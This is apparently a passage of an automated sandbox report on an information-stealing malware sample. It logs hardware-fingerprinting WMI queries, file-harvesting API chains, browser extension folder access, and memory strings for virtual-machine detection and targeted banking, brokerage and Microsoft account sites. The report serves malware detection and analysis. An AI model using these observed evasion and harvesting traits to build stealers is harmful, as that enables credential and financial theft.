                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421DC48 FindFirstFileExA,0_2_0421DC48
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00401120 GetSystemInfo,ExitProcess,2_2_00401120
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53874
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59890
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57608
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59781
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59111
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59671
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44011
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47282
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32657
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55485
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43046
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53111
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39048
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46051
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51437
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34940
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48880
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32908
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30362
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42157
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59306
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47638
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48814
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40775
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55633
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52352
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56019
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33590
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40863
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53974
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33780
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48195
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42226
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37752
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59888
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36076
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59777
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43255
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36426
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48677
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49214
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46805
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59171
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49003
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50551
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51632
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30288
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40188
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50369
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34545
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32290
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33848
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47786
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58405
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34941
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33907
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38409
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51860
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51359
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40632
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58117
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50533
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32745
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49953
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56784
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50232
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: MSBuild.exe, 00000012.00000002.3296409281.00000000016BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMS
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435145473.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.000000000434A000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                            Source: u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: VMWARE_VIRTUAL
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435599526.0000000005E22000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2266925414.0000000005E22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Full
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Full
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Microsoft Hyper-V Server
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: QEMU_HARDU
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Full
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: u3z0.1.exe, 00000009.00000003.2654917994.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480786777.0000013E51F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58454
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58457
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58483
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-59500
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58468
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58475
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58507
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00416240
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04213C4E mov eax, dword ptr fs:[00000030h]0_2_04213C4E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04200D90 mov eax, dword ptr fs:[00000030h]0_2_04200D90
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420092B mov eax, dword ptr fs:[00000030h]0_2_0420092B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EDB7B push dword ptr fs:[00000030h]0_2_042EDB7B
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00415DC0 mov eax, dword ptr fs:[00000030h]2_2_00415DC0
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0040F124 mov eax, dword ptr fs:[00000030h]4_2_0040F124
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00420C1A GetProcessHeap,0_2_00420C1A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
